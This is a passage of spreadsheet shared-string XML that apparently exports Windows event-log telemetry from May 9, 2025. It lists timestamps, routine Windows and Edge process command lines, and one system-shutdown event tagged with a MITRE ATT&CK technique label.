    <t>May 9, 2025 @ 11:35:34.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:41.959</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:41.960</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:41.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:45.807</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:51.647</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_1.25.390.0_x64__8wekyb3d8bbwe\\WindowsPackageManagerServer.exe\" -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:35:51.648</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:22.248</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:22.274</t>
  </si>
  <si>
    <t>taskhostw.exe -RegisterUserDevice -NewAccount</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:22.306</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:24.002</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:24.502</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:28.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:28.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.876</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.878</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.891</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.892</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.894</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:29.898</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:46.450</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:47.702</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:47.713</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:47.862</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:47.864</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.036</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.063</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.210</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.470</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.831</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.889</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:48.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.172</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.217</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.232</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.283</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.312</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.339</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.361</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.476</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.917</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:53.951</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:54.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:54.728</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:36:55.356</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:01.391</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:01.451</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:06.971</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:DFABG4rRc0W1LPz1.0.4 -wce:0000000000000210  -m:devinv.dll -f:CreateDeviceInventory</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:06.972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</si>
  <si>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--field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=7548 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:22.166</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:22.167</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:22.169</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k Camera</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:26.560</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:27.748</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:27.752</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:27.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:27.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:27.810</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXfkd8mejksk4ancwf4vtyhmkvtzn1jcbs.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:27.811</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\backgroundTaskHost.exe\" -ServerName:App.AppXe9cvj1thv1hmcw0cs98xm3r97tyzy2xs.mca</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:31.390</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:36.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:37.412</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\135.0.3179.98\\msedgewebview2.exe\" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.26100.3624 --noerrdialogs --user-data-dir=\"C:\\Users\\Engineer\\AppData\\Local\\Packages\\MicrosoftWindows.Client.WebExperience_cw5n1h2txyewy\\LocalState\\EBWebView\" --webview-exe-name=Widgets.exe --webview-exe-version=525.8401.20.0 --embedded-browser-webview=1 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1788,i,9932586443574054993,11319253262182182435,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msETFOffstoreExtensionFileDataCollection,msETFPasswordTheftDNRActionSignals,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillShowDeployedPassword,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEdgeWebContentFilteringFeedback,msEdgeWorkSearchBanner,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=4324 /prefetch:10 /pfhostedapp:bbee653ad5d461f7265ca33b8d62b0b69aeb801d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:41.349</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:41.368</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:42.963</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:43.038</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:43.661</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:43.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:45.820</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:45.821</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:45.822</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:46.863</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:46.896</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:46.931</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x4 /state0:0xa3d21855 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:47.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:47.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:47.767</t>
  </si>
  <si>
    <t>System shutdown initiated.</t>
  </si>
  <si>
    <t>[T1529]</t>
  </si>
  <si>
    <t>[System Shutdown/Reboot]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:48.555</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:49.695</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:49.740</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:52.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:52.208</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:52.280</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:52.316</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:52.346</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:37:53.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:01.825</t>
  </si>
  <si>
    <t>WSearch was unavailable to handle a notification event.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:03.267</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:03.330</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:03.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:06.850</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:06.874</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:09.847</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:18.549</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:18.736</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:18.834</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:18.901</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:19.312</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=price_comparison_service.mojom.DataProcessor --lang=en-GB --service-sandbox-type=entity_extraction --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=1992,i,12765322401789080612,2666233780739743436,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:28.740</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:29.375</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:31.789</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:31.828</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:31.829</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:35.610</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:36.986</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x270,0x274,0x278,0x26c,0x268,0x7ffe30347088,0x7ffe30347094,0x7ffe303470a0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:37.047</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x4 /state0:0xa3e3a055 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:37.656</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:38.030</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,7220214267384113180,9687921836578401995,262144 --variations-seed-version --mojo-platform-channel-handle=2448 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:38.031</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2212,i,7220214267384113180,9687921836578401995,262144 --variations-seed-version --mojo-platform-channel-handle=2732 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:38.104</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2212,i,7220214267384113180,9687921836578401995,262144 --variations-seed-version --mojo-platform-channel-handle=2860 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:38.946</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:45.866</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:38:47.312</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe7_ Global\\UsGthrCtrlFltPipeMssGthrPipe7 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:39:48.134</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:39:48.135</t>
  </si>
  <si>
    <t>May 9, 2025 @ 11:39:50.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:10:50.796</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:10:57.531</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:11:13.293</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:11:13.298</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:11:53.643</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:12:29.742</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:12:57.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:13:21.840</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:13:47.094</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:13:50.138</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:13:56.224</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:15:16.540</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:15:16.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:16:18.636</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:16:49.804</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:16:52.455</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:16:57.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:18:21.867</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:18:21.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:18:29.874</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:18:31.881</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:18:39.915</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:01.468</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:02.362</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.184</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.187</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.608</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.614</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.619</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.623</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.667</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.677</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.684</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.692</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.702</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.703</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.732</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.737</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:03.744</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.639</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.900</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.902</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.910</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.914</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.916</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.919</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.956</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:04.958</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.251</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.268</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.316</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.333</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.348</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.363</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.596</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.613</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.644</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.659</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.675</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.691</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.708</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.723</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.868</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.884</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.900</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.916</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.932</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.948</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.981</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:05.996</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.012</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.029</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.065</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.067</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.121</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.126</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.129</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.155</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.170</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.202</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.216</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.265</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.281</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.297</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.314</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.332</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.346</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.365</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.894</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.921</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.937</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:06.953</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.370</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.409</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.431</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.446</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.488</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.509</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.527</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.544</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.578</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.587</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:09.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:10.457</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:10.463</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:10.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:10.481</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:10.491</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:10.497</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.464</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.466</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.768</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.779</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.786</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.787</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.792</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.801</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.802</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.805</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.831</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.832</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.843</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.845</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.847</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.864</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:11.865</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.890</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.893</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.895</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.897</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.899</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.902</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.917</t>
  </si>
  <si>
    <t>May 9, 2025 @ 13:21:12.933</t>
  </si>
  <si>
